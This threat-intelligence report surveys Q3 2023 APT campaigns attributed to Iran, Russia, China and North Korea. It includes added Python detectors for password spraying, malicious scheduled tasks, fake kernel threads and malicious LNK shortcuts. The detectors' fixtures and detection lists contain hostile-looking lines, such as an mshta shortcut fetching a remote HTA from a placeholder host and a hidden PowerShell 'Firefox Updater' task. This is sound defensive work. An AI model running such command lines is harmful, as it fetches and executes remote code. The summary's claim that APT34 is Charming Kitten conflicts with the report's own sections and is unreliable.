The third quarter of 2023 witnessed a surge in the dynamic and ever-evolving activities of Advanced Persistent Threat (APT) groups originating from various global regions, including China, North Korea, Iran, and Russia. These APT collectives have demonstrated remarkable adaptability and innovation, effectively challenging the global cybersecurity landscape.
In particular, Chinese APT groups, notably APT41, have showcased their agility by expanding their operations into the realm of mobile platforms. Furthermore, the Budworm group has significantly underscored the sophistication of Chinese APT operations through their advanced technical capabilities.
North Korean APT groups, typified by Kimsuky (APT43) and the Lazarus Group, continued to adapt, introducing novel tactics such as the use of LNK-format malware and spear-phishing campaigns. ScarCruft, a North Korean actor, has also contributed to the ever-evolving threat landscape by deploying malware with innovative deception techniques.
Iranian APT groups, with Charming Kitten as a prime example, engaged in multifaceted campaigns, targeting Iranian dissidents in Germany and exploiting vulnerabilities in Microsoft Exchange servers. Their introduction of new malware, including the Powerstar backdoor, and the adoption of the InterPlanetary File System, showcased their technological prowess.
Simultaneously, Russian APT29 set its sights on the Ministries of Foreign Affairs of NATO-aligned countries, utilizing the Duke malware and an evasive command-and-control system through Zulip, employing deceptive PDF documents that impersonated the German embassy.
This report provides a comprehensive summary of the activities observed and analyzed by CYFIRMA researchers from various active APT groups throughout Q3 2023. These activities underscore the ever-changing nature of APT operations on a global scale, highlighting the ongoing need for sustained vigilance, user education, and prompt software updates to effectively counter their persistent and agile actions in the cybersecurity landscape.
United Arab Emirates
Microsoft Exchange Servers
Social Media Apps
Remote monitoring and management tools
Individuals: Lawyers, Journalists, Human Rights Activists
During the third quarter of 2023, Charming Kitten, a threat actor known for its cyber campaigns, was observed engaging in multifaceted activities. In August, the focus shifted towards Iranian dissident organizations and individuals residing in Germany, including lawyers, journalists, and human rights activists. Employing sophisticated social engineering techniques, the hackers crafted false personas tailored to their victims, establishing rapport in order to compromise targets. This campaign specifically aimed at infiltrating the Iranian opposition and exiles based in Germany.
The threat actor executed spear-phishing tactics to acquire sensitive information. Counterfeit messages, appearing legitimate, were sent to potential victims, with the objective of gaining access to their online services such as email accounts, cloud storage, or messenger services. The attackers meticulously explored the preferences and interests of their targets, including politically inclined interests. Subsequently, they initiated personal contact, creating a false sense of security before inviting the victim to an online video chat. During this interaction, victims were tricked into entering login details to a provided link, enabling the attacker to potentially access their online accounts.
In September, Charming Kitten expanded its focus to target unpatched Microsoft Exchange servers in Israel, Brazil, and the United Arab Emirates. The threat group gained initial access by exploiting known vulnerabilities in internet-exposed Microsoft Exchange servers. Conducting thorough scans of systems or networks, they identified weaknesses and vulnerabilities, subsequently targeting and exploiting them. The victims spanned various industries, including automotive, manufacturing, engineering, financial services, media, healthcare, technology, and telecommunications. The exploitation of the critical Exchange remote code execution vulnerability, CVE-2021-26855, played a pivotal role in gaining initial access.
Simultaneously, Charming Kitten updated its malware arsenal in September. This upgrade involved an updated iteration of the Powerstar backdoor, also recognized as CharmPower. Notably, this malware incorporates advanced functionalities like the integration of the InterPlanetary File System. Additionally, its decryption function and configuration details are now hosted remotely on publicly.
In August, APT34 orchestrated a phishing attack utilizing a variant of the SideTwist Trojan. The decoy file employed for this operation was labeled “GGMS Overview.doc,” portraying an introduction to a fictitious company named “Ganjavi Global Marketing Services.” Concealed within the document’s malicious macro code was the deployment mechanism for the Trojan. This macro code extracted the Trojan SystemFailureReporter.exe, encoded in base64 format within the document, releasing it to the %LOCALAPPDATA%\SystemFailureReporter\ directory. A text file named update.xml was concurrently created in the same directory, serving as the trigger for the Trojan program. The malicious macro then established a scheduled task named SystemFailureReporter, invoking the Trojan every 5 minutes for repeated execution. Notably, this Trojan variant, akin to the SideTwist Trojan in previous campaigns, differed by being compiled using GCC. Its primary functions included communication with the CnC, execution of commands from the CnC terminal, and uploading local files to the CnC. Distinctively, the Trojan lacked a cyclic or sleep mechanism and automatically exited after CnC communication, awaiting reinvocation by the scheduled task.
In a separate observed campaign in August, APT34 engaged in targeted phishing, utilizing the file “MyCv.doc,” seemingly a license registration form related to the Seychelles Licensing Authority. Curiously, the document contained pricing information in Saudi Riyal, suggesting the target was an organization within Saudi Arabia. This document was instrumental in deploying a new malware, Menorah, and establishing a scheduled task for persistence. Menorah, designed for cyberespionage, possessed capabilities to identify the machine, read and upload files, and download additional files or malware.
Simultaneously, OilRig (APT34) targeted government clients of an IT company in the Middle East for cyber espionage. Operating under the guise of a UAE-based IT company, the threat actors sent a recruitment form to the target. Upon opening the malicious document, presumably to apply for the advertised IT job, the victim triggered info-stealing malware. It is suspected that LinkedIn was exploited to deliver the job form, impersonating an IT company’s recruitment effort.
Peach Sandstorm (also known as APT33, Elfin, and Refined Kitten) employed password-spraying techniques from February to July 2023. This group exhibited a particular interest in the satellite, defense, and pharmaceutical sectors. While password spraying was the primary tactic, instances of vulnerability exploitation were noted, targeting remote code execution bugs in Zoho (CVE-2022-47966) and Confluence (CVE-2022-26134). In certain intrusions, APT33 utilized the commercial remote monitoring and management tool AnyDesk to maintain persistent access with the ultimate goal of stealing intelligence aligned with Iranian state interests.
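Password spraying, as described above, is detectable precisely because it inverts the brute-force pattern: one source tries a small number of passwords against many accounts instead of many passwords against one. The following is an added example written for this report, not CYFIRMA's or any vendor's code; it runs a sliding-window classifier over a constructed CSV authentication log (timestamp, source IP, username, result) using documentation-range IP addresses and invented account names. The thresholds (five distinct accounts with at most three failures each within 30 minutes for a spray, ten failures on a single account for brute force) are assumptions to be tuned per environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "timestamp,source_ip,username,result".
SPRAY_USERS = ["a.khan", "b.lee", "c.ortiz", "d.novak", "e.sato", "f.weber", "g.ibrahim", "h.park"]
SAMPLE_LOG = (
    # one failed logon per account from a single source within eight minutes: the spray pattern
    [f"2023-07-12T02:{m:02d}:00,203.0.113.7,{u},FAIL" for m, u in enumerate(SPRAY_USERS)]
    # twelve failures against one account from another source: classic brute force
    + [f"2023-07-12T02:{10 + i // 3:02d}:{(i % 3) * 20:02d},198.51.100.9,svc_backup,FAIL" for i in range(12)]
    # a user who mistyped twice and then succeeded: benign noise
    + ["2023-07-12T02:15:00,192.0.2.5,c.ortiz,FAIL",
       "2023-07-12T02:15:30,192.0.2.5,c.ortiz,FAIL",
       "2023-07-12T02:16:00,192.0.2.5,c.ortiz,OK"]
)


def parse_line(line):
    """Split one CSV record into (datetime, source_ip, username, result)."""
    ts, src, user, result = line.strip().split(",")
    return datetime.fromisoformat(ts), src, user, result


def classify_sources(lines, window=timedelta(minutes=30), min_accounts=5,
                     max_per_account=3, brute_threshold=10):
    """Return {source_ip: 'password_spray' | 'brute_force'} for sources whose
    failed logons inside any `window` match one of the two patterns."""
    failures = defaultdict(list)  # source_ip -> [(timestamp, username)]
    for line in lines:
        ts, src, user, result = parse_line(line)
        if result == "FAIL":
            failures[src].append((ts, user))

    verdicts = {}
    for src, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance the window start so that events[start:end+1] spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in events[start:end + 1])
            # spray: many distinct accounts, few attempts on each
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
                verdicts[src] = "password_spray"
                break
            # brute force: one account hammered repeatedly
            if len(per_user) == 1 and sum(per_user.values()) >= brute_threshold:
                verdicts[src] = "brute_force"
                break
    return verdicts


if __name__ == "__main__":
    for src, verdict in classify_sources(SAMPLE_LOG).items():
        print(f"{src}: {verdict}")
```

The benign source never reaches either threshold and is not reported. In production the same logic applies to Windows 4625 events or identity-provider sign-in logs once they are normalized to the four fields above; the window should be wide (sprays are deliberately slow) and the per-account ceiling low, because raising it makes a spray look like ordinary lockout noise.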
The Iranian Advanced Persistent Threat (APT) landscape in Q3 2023 showcased a range of sophisticated campaigns. APT34, also known as Charming Kitten and OilRig, demonstrated a notable shift in tactics, employing advanced phishing attacks with variants of the SideTwist Trojan and Menorah malware. These campaigns targeted entities in the United States and Saudi Arabia, showcasing a geopolitical focus. Furthermore, the deceptive tactics extended to fake job recruitment efforts through LinkedIn, illustrating the group’s adaptability. Additionally, Peach Sandstorm (APT33) continued its cyber espionage activities, employing password spraying and exploiting vulnerabilities in sectors such as satellite, defense, and pharmaceuticals. The overarching objective remained the theft of sensitive information aligned with Iranian state interests.
NATO and aligned nations
Chat and collaborative software
Microsoft Exchange Servers
Open-source chat application
In Q3, APT29 came into focus for its strategic targeting of Ministries of Foreign Affairs in NATO-aligned nations. Employing the Duke malware, a tool associated with Russian state-sponsored cyber espionage attributed to APT29, this campaign exhibited the group’s proficiency. Notably, APT29 leveraged the open-source chat application Zulip for command-and-control purposes, employing this tactic to obscure its activities beneath the veneer of legitimate web traffic.
The modus operandi of APT29 involved the distribution of deceptive PDF documents that posed as correspondence from the German embassy. These documents were laced with invitation lures, cunningly designed to ensnare diplomatic entities. Two overarching themes, “Farewell to Ambassador of Germany” and “Day of German Unity,” were skillfully employed as bait in this campaign. This innovative approach underscored APT29’s adaptability and sophistication in orchestrating targeted cyber espionage operations.
In a concerning development during Q3, an infamous Russian cyberespionage group was identified as carrying out a damaging attack on a critical energy facility in Ukraine. The assailants employed a phishing email campaign as the initial entry point to compromise the targeted systems. The phishing email included three images, along with a seemingly innocuous message, “Hi! I talked to three girls, and they agreed. Their photos are in the archive; I suggest checking them out on the website.”
The deceptive archive, however, concealed a BAT (Batch) file, a type of Windows script used for automating tasks. When the unsuspecting victim executed this file, it triggered the opening of deceptive web pages designed to appear benign. Simultaneously, a malicious script was unleashed on the victim’s device, leading to catastrophic consequences. The aftermath of this onslaught resulted in severe damage to power plants, major transmission lines, and substations, causing daily blackouts that persisted for hours on end. The disturbing reality is that these blackouts may persist, as there are reports of Russia preparing its arsenal for potential future actions in this vein.
In the month of July, a threat actor with suspected ties to Russia, identified as RomCom, set its sights on entities that were actively supporting Ukraine, with a particular emphasis on attendees of the 2023 NATO Summit. This summit held critical discussions regarding the ongoing conflict in Ukraine and the potential inclusion of new member states, such as Sweden and Ukraine. Capitalizing on this pivotal event, RomCom devised a series of malicious documents, seemingly intended for distribution among pro-Ukraine supporters. RomCom likely leveraged spear-phishing techniques as part of its distribution strategy, with one of the malicious documents employing an embedded RTF file and OLE objects to initiate an infection sequence. This sequence was designed to extract system information and deliver the RomCom remote access trojan (RAT). At a crucial juncture in the infection chain, the threat actor exploited a vulnerability in Microsoft’s Support Diagnostic Tool (MSDT), recognized as CVE-2022-30190 or Follina, to achieve remote code execution (RCE).
The primary targets of this campaign appeared to be representatives from Ukraine, foreign entities, and individuals actively endorsing the Ukrainian cause. While RomCom was initially associated with financial motivations, recent shifts in their tactics and underlying motivations have raised suspicions of a potential alignment with the Russian government.
In July, the Russian state-sponsored hacking group Turla targeted the defense industry and Microsoft Exchange servers with a newly identified malware backdoor known as ‘DeliveryCheck.’ Their attacks began with phishing emails containing malicious macros hidden in Excel XLSM attachments. Upon activation, these macros executed a PowerShell command, creating a scheduled task disguised as a Firefox browser updater. This task, however, was responsible for downloading and launching the DeliveryCheck backdoor, allowing Turla to establish a connection to their command-and-control server for further instructions.
DeliveryCheck stands out due to its incorporation of a server-side component specifically designed for Microsoft Exchange servers, essentially converting the server into a command-and-control center for attackers. The primary objective of this campaign was to exfiltrate files containing messages from the Signal Desktop messaging application, potentially providing access to private Signal conversations, as well as various documents, images, and archive files on the compromised systems.
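Both the APT34 SideTwist chain (a task named SystemFailureReporter firing every 5 minutes from %LOCALAPPDATA%) and the Turla chain above (a task disguised as a Firefox updater that actually launches a PowerShell command) persist through the Windows Task Scheduler, so task-creation telemetry is the common detection point. The example below is added for this report and is not CYFIRMA's or Microsoft's code: it takes constructed records shaped like Windows Security event 4698 (TaskName plus the task definition XML in TaskContent), parses the action and repetition interval, and reports the traits the two campaigns share. The task names, paths and the script file name are invented; the XML namespace is the real Task Scheduler schema namespace.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# Locations a standard user can write to; a service-like task running from here is suspicious.
USER_WRITABLE = ("%localappdata%", "%appdata%", "%temp%", "%tmp%", "\\appdata\\",
                 "c:\\users\\public\\", "\\temp\\")
SCRIPT_HOSTS = ("powershell", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32")
UPDATER_WORDS = ("firefox", "chrome", "edge", "update", "updater")


def iso_duration_seconds(text):
    """Convert a Task Scheduler ISO 8601 duration such as PT5M or P1DT2H to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def task_details(task_xml):
    """Return (command, arguments, shortest repetition interval in seconds or None)."""
    root = ET.fromstring(task_xml)
    exec_el = root.find(f".//{TASK_NS}Exec")
    command = exec_el.findtext(f"{TASK_NS}Command", "") if exec_el is not None else ""
    args = exec_el.findtext(f"{TASK_NS}Arguments", "") if exec_el is not None else ""
    intervals = [iso_duration_seconds(i.text) for i in root.iter(f"{TASK_NS}Interval")]
    intervals = [i for i in intervals if i is not None]
    return command, args, (min(intervals) if intervals else None)


def triage_task(name, task_xml, max_interval=300):
    """List the suspicious traits of one scheduled task definition."""
    command, args, interval = task_details(task_xml)
    cmd_l, name_l = command.lower(), name.lower()
    findings = []
    if any(p in cmd_l for p in USER_WRITABLE):
        findings.append("action runs from a user-writable directory")
    if interval is not None and interval <= max_interval:
        findings.append(f"repeats every {interval}s")
    if any(h in cmd_l for h in SCRIPT_HOSTS):
        findings.append("action is a script host")
    if any(w in name_l for w in UPDATER_WORDS) and "program files" not in cmd_l:
        findings.append("updater-style name but action is not under Program Files")
    return findings


def triage_events(events):
    """Map TaskName -> findings for a batch of 4698-style records."""
    return {e["TaskName"]: triage_task(e["TaskName"], e["TaskContent"]) for e in events}


def task_xml(command, arguments="", interval=None):
    """Build a minimal task definition for the constructed sample records."""
    rep = f"<Repetition><Interval>{interval}</Interval></Repetition>" if interval else ""
    return (f'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            f"<Triggers><CalendarTrigger>{rep}<StartBoundary>2023-08-01T09:00:00</StartBoundary>"
            f"<ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>"
            f'<Actions Context="Author"><Exec><Command>{command}</Command>'
            f"<Arguments>{arguments}</Arguments></Exec></Actions></Task>")


# Constructed sample records (field names follow event 4698; values are invented).
SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": "\\SystemFailureReporter",
     "TaskContent": task_xml(r"%LOCALAPPDATA%\SystemFailureReporter\SystemFailureReporter.exe",
                             interval="PT5M")},
    {"EventID": 4698, "TaskName": "\\Firefox Updater",
     "TaskContent": task_xml(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                             r"-WindowStyle Hidden -File C:\Users\Public\ffupdate.ps1")},
    {"EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": task_xml(r"%windir%\system32\defrag.exe", "-c -h -o -$")},
]

if __name__ == "__main__":
    for name, findings in triage_events(SAMPLE_EVENTS).items():
        print(name, "->", findings or "no findings")
```

The first sample record is flagged for its user-writable path and 5-minute repetition, the second for invoking a script host under an updater-style name, and the genuine defrag task produces nothing. Event 4698 must be enabled through the "Audit Other Object Access Events" subcategory, and the same parser works on exported task XML from `schtasks /query /xml` when event logs are unavailable.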
In Q3, Russian APT groups displayed heightened activity and sophistication across various campaigns. These included espionage operations targeting critical energy infrastructure in Ukraine, as well as an evolved Turla hacking group employing a new ‘DeliveryCheck’ malware backdoor. The exploitation of vulnerabilities in Microsoft Exchange servers was a common thread, allowing these threat actors to gain unauthorized access. Furthermore, Turla’s innovative use of Microsoft Exchange server-side components demonstrated an increased capacity for covert command and control. These developments emphasize the need for ongoing vigilance and security measures to counter evolving Russian APT activities.
Social engineering campaigns
United States of America
Email security gateway (ESG) appliances
In a significant development during July 2023, the Android surveillanceware, WyrmSpy and DragonEgg, was traced back to the Chinese espionage group APT41, also known as Double Dragon. APT41, which has been operating since 2012, has maintained an extensive global presence, targeting a wide array of organizations. Notably, the emergence of these malware instances represents APT41’s strategic expansion into mobile platforms.
WyrmSpy adopts a disguise as a system app, while DragonEgg conceals itself within third-party applications, often posing as keyboards or messaging apps. These deceptive tactics are coupled with requests for extensive device permissions and the utilization of additional modules designed for data exfiltration. APT41 leverages social engineering campaigns as a means of deploying these malware instances, and notably, none of these malicious apps have been identified on the official Google Play store, based on current detection.
The Budworm Advanced Persistent Threat (APT) group remains actively engaged in advancing its arsenal of cyber tools. In a recent discovery, it has come to light that Budworm deployed an updated version of one of its key tools, targeting both a Middle Eastern telecommunications organization and an Asian government, during August 2023. This latest campaign saw the utilization of a previously unseen variant of the SysUpdate backdoor (SysUpdate DLL inicore_v2.3.30.dll), equipped with a wide range of functions, including service control, screenshot capture, process management, and more. Notably, SysUpdate is a tool exclusive to Budworm, distinguishing it as a signature element of their operations. In addition to their custom malware, Budworm also employed a mix of living-off-the-land and publicly available tools in these targeted attacks, highlighting their adaptability and resourcefulness in carrying out their cyber campaigns.
In the world of cyber espionage, the Chinese hacker group ‘Earth Lusca’ has come to the fore, targeting government agencies worldwide with their novel Linux backdoor ‘SprySOCKS.’ This malware, originating from the Trochilus open-source Windows platform but adapted for Linux, exhibits a complex amalgamation of features, combining elements from RedLeaves and Derusbi. Operating throughout the first half of the year, Earth Lusca targeted government entities across Southeast Asia, Central Asia, the Balkans, and beyond. To infiltrate their targets, they used Cobalt Strike beacons to deploy the SprySOCKS loader ‘mandibule,’ which concealed itself as ‘libmonitor.so.2,’ masquerading as a Linux kernel worker thread for stealth. Once embedded, the loader decrypted SprySOCKS, allowing the threat actors to access a multitude of capabilities, including system information gathering, interactive shell initiation, network connection listing, SOCKS proxy creation, and file operations. To mitigate the risk posed by Earth Lusca, organizations are urged to prioritize applying available security updates for their public-facing server products to deter initial compromise.
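A user-space process that names itself after a kernel worker thread, as the SprySOCKS loader does, can be told apart from a real one by properties it cannot fake from user space: genuine kernel threads are children of kthreadd (PID 2), have an empty command line and no executable image, and map no shared objects. The example below is added for this report and is not Earth Lusca's, Trend Micro's or CYFIRMA's code; it applies those checks to constructed process records shaped like the fields a collector would read from /proc (pid, ppid, comm, cmdline, exe, mapped files). The PIDs, paths and the loader file name are invented.

```python
import re

# Prefixes of common kernel thread names (comm without the brackets ps adds).
KTHREAD_NAMES = re.compile(r"^(kworker|ksoftirqd|kthreadd|migration|rcu_|kswapd|kcompactd|"
                           r"watchdog|cpuhp|kblockd|jbd2)")
# Directories where a distribution normally installs shared objects.
STANDARD_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def looks_like_kernel_thread(comm, cmdline):
    """True if the process presents itself as a kernel thread by name."""
    bracketed = cmdline.startswith("[") and cmdline.endswith("]")
    return bool(KTHREAD_NAMES.match(comm.strip("[]"))) or bracketed


def is_genuine_kernel_thread(proc):
    """Properties a real kernel thread has and a user-space impostor cannot reproduce."""
    return proc["ppid"] in (0, 2) and proc["exe"] == "" and proc["cmdline"] == "" and not proc["maps"]


def triage_process(proc):
    """List the suspicious traits of one process record."""
    findings = []
    if looks_like_kernel_thread(proc["comm"], proc["cmdline"]) and not is_genuine_kernel_thread(proc):
        findings.append("kernel-thread name on a user-space process")
    for path in proc["maps"]:
        is_shared_object = path.endswith(".so") or ".so." in path
        if is_shared_object and not path.startswith(STANDARD_LIB_DIRS):
            findings.append(f"shared object loaded from non-standard path: {path}")
    if proc["exe"].endswith(" (deleted)"):
        findings.append("executable image deleted from disk while running")
    return findings


def scan(procs):
    """Map pid -> findings for every record, keeping only processes with findings."""
    return {p["pid"]: f for p in procs if (f := triage_process(p))}


# Constructed sample process table.
SAMPLE_PROCS = [
    {"pid": 1234, "ppid": 2, "comm": "kworker/0:1", "cmdline": "", "exe": "", "maps": []},
    {"pid": 4321, "ppid": 1, "comm": "kworker/1:2", "cmdline": "[kworker/1:2]",
     "exe": "/tmp/.x/loader (deleted)",
     "maps": ["/tmp/.x/libmonitor.so.2", "/lib/x86_64-linux-gnu/libc.so.6"]},
    {"pid": 812, "ppid": 1, "comm": "sshd", "cmdline": "/usr/sbin/sshd -D", "exe": "/usr/sbin/sshd",
     "maps": ["/usr/lib/x86_64-linux-gnu/libcrypto.so.3"]},
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_PROCS).items():
        print(pid, "->", findings)
```

On a live host the same records come from /proc/PID/status (PPid), /proc/PID/cmdline, the /proc/PID/exe link and /proc/PID/maps; the impostor in the sample is caught three times over, while the real kworker and sshd produce nothing. Because the loader masquerades as a library name (libmonitor.so.2), the non-standard-path check is the one that survives a renamed process.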
The Chinese APT group UNC4841 demonstrated a high level of sophistication and strategic planning in their cyber operations during Q3. They successfully exploited a zero-day vulnerability (CVE-2023-2868, CVSS 9.8) in Barracuda Email Security Gateway (ESG) appliances, a campaign that had been ongoing since at least October 2022. Although Barracuda released patches in May, UNC4841 had already entrenched itself within some systems. This not only highlights their exceptional persistence but also suggests that they had prepared tooling and tactics to endure remediation efforts, ensuring continued access to high-value targets. Significantly, this operation, despite its global reach, was far from opportunistic, underscoring UNC4841’s meticulous planning and substantial resources to anticipate and adapt to potential disruptions in their network access. Approximately 5% of ESG appliances were compromised, and following remediation attempts, UNC4841 escalated its activity by deploying new malware families such as SkipJack, DepthCharge, and Foxtrot/Foxglove backdoors. Their campaign primarily targeted governmental organizations, information technology and high-tech firms, telecommunication providers, manufacturing, and educational institutions. Notably, aerospace and defense, healthcare, biotechnology, public health, and semiconductor entities were also in their crosshairs. Many of the targeted government entities were in North America.
During Q3, the Chinese APT landscape presented a dynamic and tenacious profile. APT41 delved into mobile platforms, exemplifying their adaptability, while the Budworm APT group showcased an updated SysUpdate backdoor, underscoring their resourcefulness. Earth Lusca stood out by targeting global government agencies with the SprySOCKS Linux backdoor, demonstrating an intricate amalgamation of features from various malware strains. Meanwhile, UNC4841’s strategic planning was evident in their exploitation of a zero-day vulnerability in Barracuda Email Security Gateway appliances, allowing them to persist within high-value targets. Their actions highlighted the need for organizations to bolster their cybersecurity defenses.
Social engineering campaigns
United States of America
Social Media Platform
Fintech and cryptocurrency companies
SaaS – Supply chain attacks
In Q3, the North Korean APT group Kimsuky utilized a deceptive approach in their cyber activities. They distributed malicious batch files (*.bat), masquerading as document program viewers like Word and HWP, through email. Upon execution, these files feigned access to military or unification-related documents on Google Drive or Docs, creating the illusion of document viewing. However, these batch files had a nefarious purpose. They cunningly detected various anti-malware processes and initiated the download and execution of customized scripts for each case. For instance, when confronted with Kaspersky, the batch file replaced Word’s template file and ran a concealed cmd.exe. On the other hand, for Avast and Ahnlab processes, it downloaded scripts, altered browser and email shortcut files, and executed additional scripts. These covert tactics posed a substantial risk, potentially leading to malware infections and unauthorized system file manipulation.
Kimsuky continued to display an evolved modus operandi in Q3. In another observation, their campaigns involved the utilization of Chrome Remote Desktop in tandem with their customized AppleSeed malware to take command of compromised systems. Spear phishing served as their initial attack vector, with malware concealed within document files distributed via email. Once a system was infected, Kimsuky proceeded to install an array of malware, including Infostealers, RDP Patchers for enabling multiple remote desktop sessions, and Ngrok for remote access. Notably, they harnessed Google’s Chrome Remote Desktop to facilitate remote control via a host program. Users are strongly advised to exercise caution when dealing with suspicious email attachments and maintain up-to-date software to mitigate the risk of infection.
In July, researchers uncovered a concerning supply chain compromise that targeted a US-based software solutions provider. This sophisticated attack originated from a spear phishing campaign directed at JumpCloud, a zero-trust directory platform service integral to identity and access management. The intrusion was attributed to UNC4899, a threat actor associated with the Democratic People’s Republic of Korea (DPRK), known for its history of targeting cryptocurrency-related companies. These state-sponsored North Korean hacking groups have gained notoriety for siphoning off billions of dollars globally, with the ill-gotten gains funneled into their nuclear missile program. Notably, this incident mirrors a previous supply chain attack on the enterprise office phone company 3CX earlier in the year, with both incidents allegedly linked to North Korean state-sponsored actors seeking cryptocurrency. This pattern underscores the adaptive nature of North Korean threat actors, continuously exploring innovative avenues for infiltrating targeted networks. The JumpCloud breach is a stark example of their inclination toward supply chain targeting, raising concerns about the potential for subsequent intrusions.
In another incident, researchers discovered a cyberattack by the Lazarus group on a Spanish aerospace company in late September 2023. The attack began with a LinkedIn message from a fake Meta recruiter, leading employees to execute malicious coding challenges that delivered a sophisticated backdoor known as LightlessCan. This RAT improves stealth and employs execution guardrails to thwart unauthorized decryption. The Lazarus group, linked to North Korea, is known for high-profile cyberattacks and has targeted aerospace companies for espionage, likely to gain access to aerospace technology and support missile development. The attack in Spain is attributed to Operation DreamJob.
In a notable strategic shift, ScarCruft, a threat actor associated with North Korea, has altered its tactics by adopting the distribution of malware in LNK format, departing from their previous use of CHM. This novel malware operates by executing scripts from a designated URL through the mshta process, enabling it to receive commands from the threat actor’s server for further nefarious actions. The lure for victims is a file named ‘Status Survey Table.xlsx.lnk,’ which cunningly conceals both a seemingly ordinary document and a concealed malicious script. Upon execution, this malware establishes persistence by making registry modifications and establishes connections with malicious servers. ScarCruft showcases a tendency to continuously modify its scripts, facilitating a range of malicious activities. Users are strongly advised to exercise caution, especially when encountering large LNK files from unverified or unknown sources.
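The two traits the paragraph highlights, an LNK that launches mshta with a URL and an LNK that is unusually large because a decoy document and script are packed inside it, are both visible from the file's structure without executing it. The example below is added for this report and is not ScarCruft's, AhnLab's or CYFIRMA's code: it is a minimal parser for the Shell Link (.lnk) binary format (header, optional ID list and link-info blocks, the string-data fields, extra-data blocks) that reports a script host in the target or arguments, a URL in the arguments, bytes appended after the last structure, and an oversized file. The `build_lnk` helper exists only to construct test fixtures; the target path, the `c2.invalid` host and the size threshold are invented.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits from the Shell Link format specification.
FLAG_ID_LIST, FLAG_LINK_INFO, FLAG_NAME, FLAG_RELPATH = 0x01, 0x02, 0x04, 0x08
FLAG_WORKDIR, FLAG_ARGS, FLAG_ICON, FLAG_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((FLAG_NAME, "name"), (FLAG_RELPATH, "relative_path"), (FLAG_WORKDIR, "working_dir"),
                 (FLAG_ARGS, "arguments"), (FLAG_ICON, "icon_location"))
SCRIPT_HOSTS = ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32")


def parse_lnk(data):
    """Parse the header, string data and extra-data blocks; report bytes left over after them."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 76 or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & FLAG_ID_LIST:                       # LinkTargetIDList: 2-byte size, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_LINK_INFO:                     # LinkInfo: 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags}
    for flag, name in STRING_FIELDS:               # StringData: 2-byte char count, then chars
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & FLAG_UNICODE:
                info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                info[name] = data[pos:pos + count].decode("cp1252", "replace")
                pos += count
    while pos + 4 <= len(data):                    # ExtraData blocks end with a size < 4
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 4:
            pos += 4
            break
        if pos + size > len(data):
            break
        pos += size
    info["size"] = len(data)
    info["trailing_bytes"] = max(0, len(data) - pos)
    return info


def triage_lnk(data, size_threshold=1_000_000):
    """Return (parsed fields, list of suspicious traits)."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "").lower()
    findings = []
    if any(h in target or h in args for h in SCRIPT_HOSTS):
        findings.append("shortcut invokes a script host")
    if "http://" in args or "https://" in args:
        findings.append("URL passed in arguments")
    if info["trailing_bytes"]:
        findings.append(f"{info['trailing_bytes']} bytes appended after the shell link structures")
    if info["size"] > size_threshold:
        findings.append(f"file size {info['size']} exceeds {size_threshold}")
    return info, findings


def build_lnk(relative_path, arguments, appended=b""):
    """Construct a minimal Unicode .lnk for testing: header, two string fields, terminal block."""
    flags = FLAG_RELPATH | FLAG_ARGS | FLAG_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 76, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) + struct.pack("<I", 0) + appended


# Constructed fixtures: a lure-style shortcut with 300 bytes of padding standing in for a hidden document, and a plain one.
SUSPICIOUS_LNK = build_lnk("..\\..\\..\\Windows\\System32\\mshta.exe", "http://c2.invalid/run.hta", b"\x00" * 300)
BENIGN_LNK = build_lnk("..\\..\\Program Files\\App\\app.exe", "")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        fields, findings = triage_lnk(blob, size_threshold=200)
        print(label, fields.get("relative_path"), fields.get("arguments"), findings)
```

The parser deliberately stops at structure boundaries rather than trusting the file size: anything after the terminal extra-data block is by definition not part of the shortcut, which is exactly where a concealed document or script ends up. Real-world triage would also extract and inspect those trailing bytes, and compare the icon location against the claimed document type (an .xlsx lure carrying an executable's icon).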
